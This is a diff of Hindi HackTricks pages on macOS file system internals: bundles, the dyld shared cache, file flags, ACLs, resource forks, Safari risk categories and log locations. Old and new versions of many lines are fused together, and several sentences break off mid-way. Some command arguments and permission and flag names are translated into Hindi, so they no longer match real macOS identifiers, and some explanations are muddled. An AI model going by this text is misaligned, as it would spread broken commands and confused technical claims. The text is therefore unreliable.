* **`.dylib`**: डायनामिक लाइब्रेरीज़ (विंडोज DLL फाइल्स की तरह) * **`.dylib`**: डायनामिक लाइब्रेरीज (जैसे Windows DLL फ़ाइलें)
* **`.pkg`**: xar (eXtensible Archive format) के समान हैं। इंस्टॉलर कमांड का इस्तेमाल इन फाइल्स की सामग्री को इंस्टॉल करने के लिए किया जा सकता है। * **`.pkg`**: xar (eXtensible Archive format) के समान हैं। इन फ़ाइलों के सामग्री को इंस्टॉल करने के लिए इंस्टॉलर कमांड का उपयोग किया जा सकता है।
* **`.DS_Store`**: यह फाइल प्रत्येक डायरेक्टरी में होती है, यह डायरेक्टरी के गुणों और कस्टमाइजेशन को सेव करती है। * **`.DS_Store`**: हर डायरेक्टरी पर यह फ़ाइल होती है, यह डायरेक्टरी की विशेषताएँ और कस्टमाइजेशन को सहेजती है।
* **`.Spotlight-V100`**: यह फोल्डर सिस्टम पर हर वॉल्यूम की रूट डायरेक्टरी पर दिखाई देता है। * **`.Spotlight-V100`**: यह फ़ोल्डर प्रत्येक वॉल्यूम के रूट डायरेक्टरी पर दिखाई देता है।
* **`.metadata_never_index`**: अगर यह फाइल किसी वॉल्यूम की रूट पर है तो Spotlight उस वॉल्यूम को इंडेक्स नहीं करेगा। * **`.metadata_never_index`**: यदि यह फ़ाइल किसी वॉल्यूम के रूट पर है तो Spotlight उस वॉल्यूम को इंडेक्स नहीं करेगा।
* **`.noindex`**: इस एक्सटेंशन वाली फाइल्स और फोल्डर्स को Spotlight द्वारा इंडेक्स नहीं किया जाएगा * **`.noindex`**: इस एक्सटेंशन वाली फ़ाइलें और फ़ोल्डर Spotlight द्वारा इंडेक्स नहीं की जाएंगी
### macOS बंडल्स ### macOS बंडल्स
मूल रूप से, एक बंडल फाइल सिस्टम के भीतर एक **डायरेक्टरी संरचना** है। दिलचस्प बात यह है कि डिफ़ॉल्ट रूप से यह डायरेक्टरी Finder में एक एकल ऑब्जेक्ट की तरह दिखती है (जैसे `.app`).&#x20; एक बंडल एक **डायरेक्टरी** है जो **फाइंडर में एक ऑब्जेक्ट की तरह दिखती है** (एक बंडल उदाहरण हैं `*.app` फ़ाइलें)।
{% content-ref url="macos-bundles.md" %} {% content-ref url="macos-bundles.md" %}
[macos-bundles.md](macos-bundles.md) [macos-bundles.md](macos-bundles.md)
@ -86,9 +85,11 @@ MacOS पासवर्ड्स जैसी जानकारी कई ज
## Dyld Shared Cache ## Dyld Shared Cache
macOS (और iOS) पर सभी सिस्टम शेयर्ड लाइब्रेरीज़, जैसे कि frameworks और dylibs, एक एकल फाइल में **संयुक्त किए जाते हैं**, जिसे **dyld shared cache** कहा जाता है। यह प्रदर्शन में सुधार करता है, क्योंकि कोड को तेजी से लोड किया जा सकता है। macOS (और iOS) पर सभी सिस्टम साझा लाइब्रेरी, जैसे फ़्रेमवर्क और dylibs, को **एक ही फ़ाइल में** मिलाकर, जिसे **dyld साझा कैश** कहा जाता है। यह प्रदर्शन में सुधार करता है, क्योंकि कोड तेजी से लोड किया जा सकता है।
dyld shared cache के समान, कर्नेल और कर्नेल एक dyld साझा कैश के समान, कर्नेल और कर्नेल एक्सटेंशन भी एक कर्नेल कैश में कॉम्पाइल किए जाते हैं, जो बूट समय पर लोड किया जाता है।
एकल फ़ाइल dylib साझा कैश से पुस्तकालयों को निकालने के लिए संभव था जिसे बाइनरी [
```bash ```bash
# dyld_shared_cache_util # dyld_shared_cache_util
dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
@ -100,56 +101,56 @@ dyldex_all [dyld_shared_cache_path] # Extract all
``` ```
{% endcode %} {% endcode %}
पुराने संस्करणों में आप **`/System/Library/dyld/`** में **साझा कैश** पा सकते हैं। बुनियादी संस्करणों में आप **`/System/Library/dyld/`** में **`विभाजित कैश`** पा सकते हैं।
iOS में आप उन्हें **`/System/Library/Caches/com.apple.dyld/`** में पा सकते हैं। iOS में आप उन्हें **`/System/Library/Caches/com.apple.dyld/`** में पा सकते हैं।
{% hint style="success" %} {% hint style="success" %}
ध्यान दें कि यदि `dyld_shared_cache_util` उपकरण काम नहीं करता है, तो आप **साझा dyld बाइनरी को Hopper को पास कर सकते हैं** और Hopper सभी लाइब्रेरीज की पहचान कर सकता है और आपको **चुनने देगा कि** आप किसकी जांच करना चाहते हैं: ध्यान दें कि यदि `dyld_shared_cache_util` उपकरण काम नहीं करता है, तो आप **साझा dyld बाइनरी को Hopper को पारित कर सकते हैं** और Hopper सभी पुस्तकालयों की पहचान करने में सक्षम होगा और आपको **जिसे आप जांचना चाहते हैं, उसे चुनने देगा**:
{% endhint %} {% endhint %}
<figure><img src="../../../.gitbook/assets/image (680).png" alt="" width="563"><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (680).png" alt="" width="563"><figcaption></figcaption></figure>
## विशेष फाइल अनुमतियाँ ## विशेष फाइल अनुमतियाँ
### फ़ोल्डर अनुमतियाँ ### फ़ोल्डर अनुमतियाँ
एक **फ़ोल्डर** में, **पढ़ने** की अनुमति से **सूचीबद्ध करने** की अनुमति मिलती है, **लिखने** की अनुमति से **हटाने** और फ़ोल्डर में फाइलों को **लिखने** की अनुमति मिलती है, और **निष्पादित** करने की अनुमति से डायरेक्टरी को **पार करने** की अनुमति मिलती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता जिसके पास फ़ाइल के ऊपर **पढ़ने की अनुमति** है लेकिन वह डायरेक्टरी में **निष्पादित की अनुमति नहीं है**, वह फ़ाइल को **पढ़ नहीं पाएगा**। **फ़ोल्डर** में, **पढ़ने** से इसे **सूचीत करने** की अनुमति होती है, **लिखने** से इसे **हटाने** और फ़ाइलों पर **लिखने** की अनुमति होती है, और **क्रियान्वयन** से निर्देशिका **चालू करने** की अनुमति होती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता को **फ़ाइल पर पढ़ने की अनुमति** होने पर भी उस निर्देशिका में जिस पर उसके **क्रियान्वयन** की अनुमति नहीं है, **फ़ाइल पढ़ने में सक्षम नहीं होगा**।
### फ्लैग संशोधक ### ध्वज संशोधक
कुछ फ्लैग होते हैं जो फाइलों में सेट किए जा सकते हैं जिससे फाइल अलग तरह से व्यवहार करेगी। आप डायरेक्टरी के अंदर फाइलों के फ्लैग्स की **जांच** `ls -lO /path/directory` के साथ कर सकते हैं कुछ ध्वज हैं जो फ़ाइलों में सेट किए जा सकते हैं जो फ़ाइल का व्यवहार अलग बना देंगे। आप `ls -lO /पथ/निर्देशिका` के साथ निर्देशिका में फ़ाइलों के ध्वजों की जांच कर सकते हैं।
* **`uchg`**: **uchange** फ्लैग के रूप में जाना जाता है जो **किसी भी कार्रवाई को रोकेगा** जो फाइल को बदलने या हटाने से संबंधित है। इसे सेट करने के लिए करें: `chflags uchg file.txt` * **`uchg`**: **uchange** ध्वज के रूप में जाना जाता है जो किसी भी क्रिया को **बदलने या हटाने से रोकेगा**। इसे सेट करने के लिए: `chflags uchg file.txt`
* रूट उपयोगकर्ता फ्लैग को **हटा सकता है** और फाइल को संशोधित कर सकता है * रूट उपयोगकर्ता ध्वज को **हटा सकता है** और फाइल को संशोधित कर सकता है
* **`restricted`**: यह फ्लैग फाइल को SIP द्वारा **संरक्षित** करता है (आप इस फ्लैग को फाइल में नहीं जोड़ सकते)। * **`प्रतिबंधित`**: यह ध्वज फ़ाइल को **SIP द्वारा संरक्षित** बना देगा (आप इस ध्वज को फ़ाइल में नहीं जोड़ सकते)।
* **`Sticky bit`**: यदि किसी डायरेक्टरी में स्टिकी बिट होता है, तो **केवल** डायरेक्टरी का मालिक या रूट ही फाइलों का नाम बदल सकता है या उन्हें हटा सकता है। आमतौर पर यह /tmp डायरेक्टरी पर सेट किया जाता है ताकि सामान्य उपयोगकर्ता अन्य उपयोगकर्ताओं की फाइलों को हटाने या स्थानांतरित करने से रोक सकें। * **`Sticky bit`**: यदि एक निर्देशिका में sticky bit है, **केवल** निर्देशिका के मालिक या रूट **फ़ाइलों को नाम बदल सकते हैं या हटा सकते हैं**। सामान्यत: यह /tmp निर्देशिका पर सेट किया जाता है ताकि साधारण उपयोगकर्ता अन्य उपयोगकर्ताओं की फ़ाइलों को हटाने या हटाने से रोक सकें।
### **फाइल ACLs** ### **फाइल ACLs**
फाइल **ACLs** में **ACE** (एक्सेस कंट्रोल एंट्रीज) होते हैं जहां अलग-अलग उपयोगकर्ताओं को अधिक **विस्तृत अनुमतियाँ**ी जा सकती हैं। ाइल **ACLs** में **ACE** (पहुंच नियंत्रण प्रविष्टियाँ) होती हैं जहां विभिन्न उपयोगकर्ताओं को विभिन्न अनुमतियाँ सौंपी जा सकती हैं।
एक **डायरेक्टरी** को ये अनुमतियाँ दी जा सकती हैं: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\ एक **निर्देशिका** को ये अनुमतियाँ प्रदान करना संभव है: `सूची`, `खोज`, `फ़ाइल जोड़ें`, `उपनिर्देशिका जोड़ें`, `बच्चे को हटाएं`, `बच्चे को हटाएं`\
और एक **फाइल** को: `read`, `write`, `append`, `execute`. और एक **फ़ाइल** को: `पढ़ें`, `लिखें`, `जोड़ें`, `क्रियान्वित करें`
जब फाइल में ACLs होते हैं तो आप **अनुमतियों की सूची में "+" पाएंगे जैसे कि**: जब फ़ाइल में ACLs होती हैं तो आपको **अनुमतियों को सूचीत करते समय "+" मिलेगा जैसे कि**:
```bash ```bash
ls -ld Movies ls -ld Movies
drwx------+ 7 username staff 224 15 Apr 19:42 Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies
``` ```
आप फ़ाइल के **ACLs पढ़ सकते हैं** इसके साथ: आप निम्नलिखित के साथ **फ़ाइल की ACLs पढ़ सकते हैं:**
```bash ```bash
ls -lde Movies ls -lde Movies
drwx------+ 7 username staff 224 15 Apr 19:42 Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies
0: group:everyone deny delete 0: group:everyone deny delete
``` ```
आप **सभी फाइलें जिनमें ACLs हैं** इसके साथ खोज सकते हैं (यह बहुत धीमा है): आप **सभी फ़ाइलें एसीएल के साथ** इसके साथ पा सकते हैं (यह बहुत ही धीमा है):
```bash ```bash
ls -RAle / 2>/dev/null | grep -E -B1 "\d: " ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
``` ```
### रिसोर्स फोर्क्स | macOS ADS ### संसाधन फोर्क्स | macOS ADS
यह **macOS मशीनों में अल्टरनेट डेटा स्ट्रीम्स प्राप्त करने** का एक तरीका है। आप **com.apple.ResourceFork** नामक एक्सटेंडेड एट्रिब्यूट के अंदर **file/..namedfork/rsrc** में सेव करके फाइल के अंदर सामग्री सेव कर सकते हैं यह **मैकओएस मशीनों में विकल्प डेटा स्ट्रीम्स प्राप्त करने का एक तरीका है।** आप एक फ़ाइल के अंदर **com.apple.ResourceFork** नामक विस्तारित विशेषता में सामग्री सहेज सकते हैं इसे **file/..namedfork/rsrc** में सहेजकर
```bash ```bash
echo "Hello" > a.txt echo "Hello" > a.txt
echo "Hello Mac ADS" > a.txt/..namedfork/rsrc echo "Hello Mac ADS" > a.txt/..namedfork/rsrc
@ -160,7 +161,7 @@ com.apple.ResourceFork: Hello Mac ADS
ls -l a.txt #The file length is still q ls -l a.txt #The file length is still q
-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt -rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt
``` ```
आप इस विस्तारित विशेषता वाली सभी फाइलों को **इसके साथ खोज सकते हैं**: आप इस विस्तृत विशेषता को धारित सभी फ़ाइलें निम्नलिखित के साथ पा सकते हैं:
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
@ -168,9 +169,9 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf
``` ```
{% endcode %} {% endcode %}
## **यूनिवर्सल बाइनरीज़ &** Mach-o प्रारूप ## **यूनिवर्सल बाइनरीज और** Mach-o फॉर्मेट
Mac OS बाइनरीज़ आमतौर पर **यूनिवर्सल बाइनरीज़** के रूप में संकलित की जाती हैं। एक **यूनिवर्सल बाइनरी** एक ही फ़ाइल में **कई आर्किटेक्चर्स का समर्थन कर सकती है**। मैक ओएस बाइनरीज आम तौर पर **यूनिवर्सल बाइनरीज** के रूप में कंपाइल किए जाते हैं। एक **यूनिवर्सल बाइनरी** में **एक ही फ़ाइल में कई आर्किटेक्चर का समर्थन कर सकता है**।
{% content-ref url="universal-binaries-and-mach-o-format.md" %} {% content-ref url="universal-binaries-and-mach-o-format.md" %}
[universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md) [universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md)
@ -184,36 +185,20 @@ Mac OS बाइनरीज़ आमतौर पर **यूनिवर्
## जोखिम श्रेणी फ़ाइलें Mac OS ## जोखिम श्रेणी फ़ाइलें Mac OS
फ़ाइल `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` में फ़ाइल एक्सटेंशन के आधार पर फ़ाइलों से जुड़े जोखिम शामिल होते हैं। डायरेक्टरी `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` यहाँ जानकारी होती है कि **विभिन्न फ़ाइल एक्सटेंशन के साथ जुड़े जोखिम के साथ कितना संबंध है**। इस डायरेक्टरी में फ़ाइलों को विभिन्न जोखिम स्तरों में वर्गीकृत किया जाता है, जो सफारी को डाउनलोड के बाद इन फ़ाइलों का संचालन कैसे करना है पर प्रभाव डालता है। इन श्रेणियों में निम्नलिखित शामिल हैं:
संभावित श्रेणियाँ निम्नलिखित हैं: - **LSRiskCategorySafe**: इस श्रेणी में फ़ाइलें **पूरी तरह सुरक्षित** मानी जाती हैं। सफारी इन फ़ाइलों को स्वचालित रूप से डाउनलोड के बाद खोलेगा।
- **LSRiskCategoryNeutral**: इन फ़ाइलों के साथ कोई चेतावनी नहीं होती और सफारी द्वारा **स्वचालित रूप से नहीं खोली जाती** है।
* **LSRiskCategorySafe**: **पूरी तरह से** **सुरक्षित**; Safari डाउनलोड के बाद स्वतः खुलेगा - **LSRiskCategoryUnsafeExecutable**: इस श्रेणी की फ़ाइलें **एक चेतावनी प्रेरित करती हैं** जिसमें इसका संवर्गन एक एप्लिकेशन है। यह उपयोगकर्ता को सूचित करने के लिए एक सुरक्षा उपाय के रूप में काम करता है।
* **LSRiskCategoryNeutral**: कोई चेतावनी नहीं, लेकिन **स्वतः नहीं खुलेगा** - **LSRiskCategoryMayContainUnsafeExecutable**: यह श्रेणी फ़ाइलों के लिए है, जैसे कि आर्काइव, जो एक एक्सीक्यूटेबल शामिल कर सकते हैं। सफारी **एक चेतावनी प्रेरित करेगा** जब तक यह सत्यापित नहीं कर सकता कि सभी सामग्री सुरक्षित या न्यूट्रल है।
* **LSRiskCategoryUnsafeExecutable**: **चेतावनी ट्रिगर** करता है “यह फ़ाइल एक एप्लिकेशन है...”
* **LSRiskCategoryMayContainUnsafeExecutable**: यह उन आर्काइव्स के लिए है जिनमें एक एक्ज़ीक्यूटेबल होता है। यह **चेतावनी ट्रिगर करता है जब तक कि Safari सभी सामग्री को सुरक्षित या तटस्थ निर्धारित नहीं कर लेता**
## लॉग फ़ाइलें ## लॉग फ़ाइलें
* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: डाउनलोड की गई फ़ाइलों के बारे में जानकारी रखता है, जैसे कि वे कहाँ से डाउनलोड की गई थीं * **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: डाउनलोड की गई फ़ाइलों के बारे में जानकारी रखता है, जैसे कि उन्हें कहाँ से डाउनलोड किया गया था
* **`/var/log/system.log`**: OSX सिस्टम्स का मुख्य लॉग। com.apple.syslogd.plist syslogging के निष्पादन के लिए जिम्मेदार है (आप `launchctl list` में "com.apple.syslogd" को देखकर जांच सकते हैं कि यह निष्क्रिय है या नहीं)। * **`/var/log/system.log`**: OSX सिस्टम का मुख्य लॉग। com.apple.syslogd.plist सिस्टम लॉगिंग का निष्पादन जिम्मेदार है (आप "launchctl list" में "com.apple.syslogd" की खोज करके देख सकते हैं कि क्या यह निष्क्रिय है या नहीं)।
* **`/private/var/log/asl/*.asl`**: ये Apple सिस्टम लॉग्स हैं जिनमें दिलचस्प जानकारी हो सकती है * **`/private/var/log/asl/*.asl`**: ये एप्पल सिस्टम लॉग हैं जो दिलचस्प जानकारी रख सकते हैं
* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "Finder" के माध्यम से हाल ही में एक्सेस की गई फ़ाइलों और एप्लिकेशनों को स्टोर करता है। * **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "फाइंडर" के माध्यम से हाल ही में एक्सेस की गई फ़ाइलें और एप्लिकेशन स्टोर करता है।
* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: सिस्टम स्टार्टअप पर लॉन्च करने के लिए आइटम्स को स्टोर करता है। * **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: सिस्टम स्टार्टअप पर लॉन्च करने के लिए आइटम स्टोर करता है।
* **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtility ऐप के लिए लॉग फ़ाइल (ड्राइव्स के बारे में जानकारी, यूएसबी सहित)। * **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtility ऐप के लिए लॉग फ़ाइल (ड्राइव्स के बारे में जानकारी, इसमें USB भी शामिल हैं)।
* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: वायरलेस एक्सेस पॉइंट्स के बारे में डेटा। * **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: वायरलेस एक्सेस पॉइंट्स के बारे में डेटा।
* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: निष्क्रिय किए गए डेमन्स की सूची। * **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: निष्क्रिय किए गए डेमन्स की सूची।
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से हीरो तक AWS हैकिंग सीखें</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप HackTricks में अपनी **कंपनी का विज्ञापन देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

View file

@ -2,58 +2,69 @@
<details> <details>
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहत हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**. * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपन हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके. * **अपन हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details> </details>
## मूल जानकारी ## मैकओएस बंडल्स
ूल रूप से, एक बंडल फाइल सिस्टम के भीतर एक **डायरेक्टरी संरचना** है। दिलचस्प बात यह है कि डिफ़ॉल्ट रूप से यह डायरेक्टरी **Finder में एकल ऑब्जेक्ट की तरह दिखती है**.&#x20; ैकओएस में बंडल्स एप्लिकेशन, लाइब्रेरीज़, और अन्य आवश्यक फ़ाइलों को समेत करने वाले संसाधनों के एक संग्रह के रूप में काम करते हैं, जिन्हें फाइंडर में एकल वस्तुओं के रूप में प्रदर्शित किया जाता है, जैसे परिचित `*.app` फ़ाइलें। सबसे आम बंडल `.app` बंडल है, हालांकि अन्य प्रकार जैसे `.framework`, `.systemextension`, और `.kext` भी प्रसारित हैं।
हम जिस **सामान्य** बंडल से अक्सर मिलेंगे वह है **`.app` बंडल**, लेकिन कई अन्य एक्जीक्यूटेबल्स भी बंडल्स के रूप में पैक किए जाते हैं, जैसे कि **`.framework`** और **`.systemextension`** या **`.kext`**. ### बंडल के महत्वपूर्ण घटक
एक बंडल के भीतर समाहित संसाधनों के प्रकार में एप्लिकेशन, लाइब्रेरीज, इमेजेज, डॉक्यूमेंटेशन, हेडर फाइल्स, आदि शामिल हो सकते हैं। ये सभी फाइलें `<application>.app/Contents/` के अंदर होती हैं। बंडल के भीतर, विशेष रूप से `<application>.app/Contents/` निर्देशिका के भीतर, कई महत्वपूर्ण संसाधन संग्रहित होते हैं:
```bash
- **_CodeSignature**: इस निर्देशिका में कोड-साइनिंग विवरण संग्रहित होते हैं जो एप्लिकेशन की अखंडता की पुष्टि के लिए आवश्यक होते हैं। आप इस्तेमाल करके कोड-साइनिंग जानकारी की जांच कर सकते हैं:
%%%bash
openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64
%%%
- **MacOS**: एप्लिकेशन के एक्सीक्यूटेबल बाइनरी को संचालित करने वाला निर्देशिका।
- **Resources**: एप्लिकेशन के उपयोगकर्ता इंटरफ़ेस संघटन के लिए एक भंडार है जिसमें छवियाँ, दस्तावेज़, और इंटरफ़ेस विवरण (nib/xib फ़ाइलें) शामिल हैं।
- **Info.plist**: एप्लिकेशन का मुख्य कॉन्फ़िगरेशन फ़ाइल के रूप में काम करता है, जिसे सिस्टम को एप्लिकेशन को सही ढंग से पहचानने और इंटरैक्ट करने के लिए महत्वपूर्ण माना जाता है।
#### Info.plist में महत्वपूर्ण कुंजी
`Info.plist` फ़ाइल एप्लिकेशन कॉन्फ़िगरेशन के लिए एक मूलभूत है, जिसमें CFBundleExecutable, CFBundleIdentifier, LSMinimumSystemVersion जैसी कुंजियाँ शामिल हैं।
### बंडल की खोज
`Safari.app` जैसे बंडल की सामग्री की खोज करने के लिए निम्नलिखित कमांड का उपयोग किया जा सकता है:
%%%bash
ls -lR /Applications/Safari.app/Contents ls -lR /Applications/Safari.app/Contents
``` %%%
* `Contents/_CodeSignature` -> एप्लिकेशन के **कोड-साइनिंग जानकारी** शामिल होती है (जैसे कि हैशेज आदि)।
* `openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64`
* `Contents/MacOS` -> **एप्लिकेशन का बाइनरी** शामिल होता है (जो यूजर द्वारा एप्लिकेशन आइकन पर डबल-क्लिक करने पर निष्पादित होता है)।
* `Contents/Resources` -> **एप्लिकेशन के UI तत्व** शामिल होते हैं, जैसे कि इमेजेज, दस्तावेज़, और nib/xib फाइलें (जो विभिन्न यूजर इंटरफेस का वर्णन करती हैं)।
* `Contents/Info.plist` -> एप्लिकेशन की मुख्य "**कॉन्फ़िगरेशन फ़ाइल।**" Apple का कहना है कि "सिस्टम इस फ़ाइल की उपस्थिति पर निर्भर करता है ताकि \[एप्लिकेशन] और किसी भी संबंधित फ़ाइलों के बारे में प्रासंगिक जानकारी की पहचान कर सके"।
* **Plist** **फ़ाइलें** कॉन्फ़िगरेशन जानकारी शामिल करती हैं। आप plist कीज़ के अर्थ के बारे में जानकारी [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) में पा सकते हैं।
* एप्लिकेशन का विश्लेषण करते समय रुचि के जोड़े हो सकते हैं:\\
* **CFBundleExecutable** यह खोज डायरेक्टरी जैसे `_CodeSignature`, `MacOS`, `Resources`, और फ़ाइलें जैसे `Info.plist` को प्रकट करती है, जो प्रत्येक एक अलग उद्देश्य से सुरक्षित एप्लिकेशन से लेकर उसके उपयोगकर्ता इंटरफ़ेस और परिचालन पैरामीटरों को परिभाषित करने में मदद करती है।
**एप्लिकेशन के बाइनरी का नाम** शामिल करता है (Contents/MacOS में पाया जाता है)। #### अतिरिक्त बंडल डायरेक्टरी
* **CFBundleIdentifier** सामान्य डायरेक्टरियों के अलावा, बंडल्स में निम्नलिखित भी शामिल हो सकते हैं:
एप्लिकेशन के बंडल आइडेंटिफ़ायर को शामिल करता है (अक्सर सिस्टम द्वारा एप्लिकेशन की **वैश्विक** **पहचान** करने के लिए इस्तेमाल किया जाता है)। - **Frameworks**: एप्लिकेशन द्वारा उपयोग किए जाने वाले बंडल फ़्रेमवर्क्स को संग्रहित करता है।
- **PlugIns**: एक डायरेक्टरी जो एप्लिकेशन की क्षमताएँ बढ़ाने वाले प्लगइन और एक्सटेंशन के लिए है।
- **XPCServices**: एप्लिकेशन द्वारा प्रक्रिया के बाहर संचार के लिए उपयोग किए जाने वाले XPC सेवाएँ को धारित करता है।
* **LSMinimumSystemVersion** यह संरचना सुनिश्चित करती है कि सभी आवश्यक घटक बंडल के भीतर समाहित हों, जो एक मॉड्यूलर और सुरक्षित एप्लिकेशन वातावरण को सुविधाजनक बनाती है।
**macOS के सबसे पुराने** **संस्करण** को शामिल करता है जिसके साथ एप्लिकेशन संगत है। अधिक विस्तृत जानकारी के लिए `Info.plist` कुंजियों और उनके अर्थों पर, Apple डेवलपर दस्तावेज़ीकरण व्यापक संसाधन प्रदान करता है: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
Other ways to support HackTricks: HackTricks का समर्थन करने के अन्य तरीके:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
